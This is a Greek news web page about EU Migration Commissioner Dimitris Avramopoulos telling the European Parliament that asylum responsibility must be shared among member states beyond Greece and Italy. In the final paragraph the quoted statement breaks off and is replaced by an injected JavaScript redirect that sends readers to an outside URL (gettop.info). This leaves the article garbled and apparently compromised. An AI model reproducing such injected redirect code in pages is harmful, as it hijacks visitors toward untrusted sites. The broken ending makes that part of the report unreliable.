Αβραμόπουλος: Ελλάδα και Ιταλία δεν μπορούν να επωμισθούν ολόκληρη την ευθύνη

0
6

 

O Ευρωπαίος Eπίτροπος Μετανάστευσης Δημ. Αβραμόπουλος, μιλώντας στην Ολομέλεια του Ευρωπαϊκού Κοινοβουλίου για το Ευρωπαϊκό Σύστημα Ασύλου, επεσήμανε πως οι μετεγκαταστάσεις είναι η πιο απτή απόδειξη της ευρωπαϊκής αλληλεγγύης τόσο προς τους ανθρώπους που έχουν ανάγκη προστασίας όσο και τα κράτη που δέχονται υπερβολική πίεση.

Αναφερόμενος στον σκοπό της μετεγκατάστασης, τόνισε ότι «το πιο σημαντικό είναι, μακροπρόθεσμα, να σταματήσουμε τα επικίνδυνα ταξίδια αυτών των ανθρώπων, φέρνοντάς τους στην Ευρώπη, με ασφάλεια και νόμιμο τρόπο και το έργο αυτό έχει ήδη ξεκινήσει».

«Οι μετεγκαταστάσεις και οι επανεγκαταστάσεις συγκαταλέγονται μεταξύ των κορυφαίων προτεραιοτήτων της ΕΕ κατά τους επόμενους μήνες, και είναι αλληλένδετες. Αυτές είναι οι πραγματικές ανθρωπιστικές ανάγκες για τις οποίες όλα τα κράτη μέλη θα πρέπει να σταματήσουν απλώς να μιλάνε και θα πρέπει να αρχίσουν να ενεργούν και να φέρνουν αποτελέσματα».

Πρόσθεσε πως «η καλύτερη κατανομή των ευθυνών μεταξύ των κρατών μελών είναι ένα απαραίτητο εργαλείο που διαθέτουμε για την καλύτερη διαχείριση της προσφυγικής κρίσης και των προκλήσεων που θέτει η μετανάστευση γενικότερα. Αυτή είναι η ουσία της συνολικής μας πολιτικής για τη μετανάστευση».

Ο κ. Αβραμόπουλος υπογράμμισε πως «ενώ η Ελλάδα και η Ιταλία καταβάλλουν μεγάλες προσπάθειες, δεν μπορούν να επωμισθούν ολόκληρη την ευθύνη μόνες τους για την φιλοξενία και την παροχή προστασίας προς όλους τους αιτούντες άσυλο που βρίσκονται στο έδαφός τους» για να τονίσει ότι «όλα τα κράτη μέλη πρέπει να συμμετάσχουν και να αναλάβουν το μερίδιο της ευθύνης που τους αναλογεί».

Στη συνέχεια μίλησε για την πρόταση της Επιτροπής να παράσχει τη δυνατότητα στα κράτη μέλη να χρησιμοποιήσουν τις 54.000 αδιάθετες θέσεις μετεγκαταστάσεων για επανεγκαταστάσεις, καθώς και άλλες μορφές νόμιμης αποδοχής των Συρίων από την Τουρκία προς την ΕΕ, για να υπογραμμίσει: setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here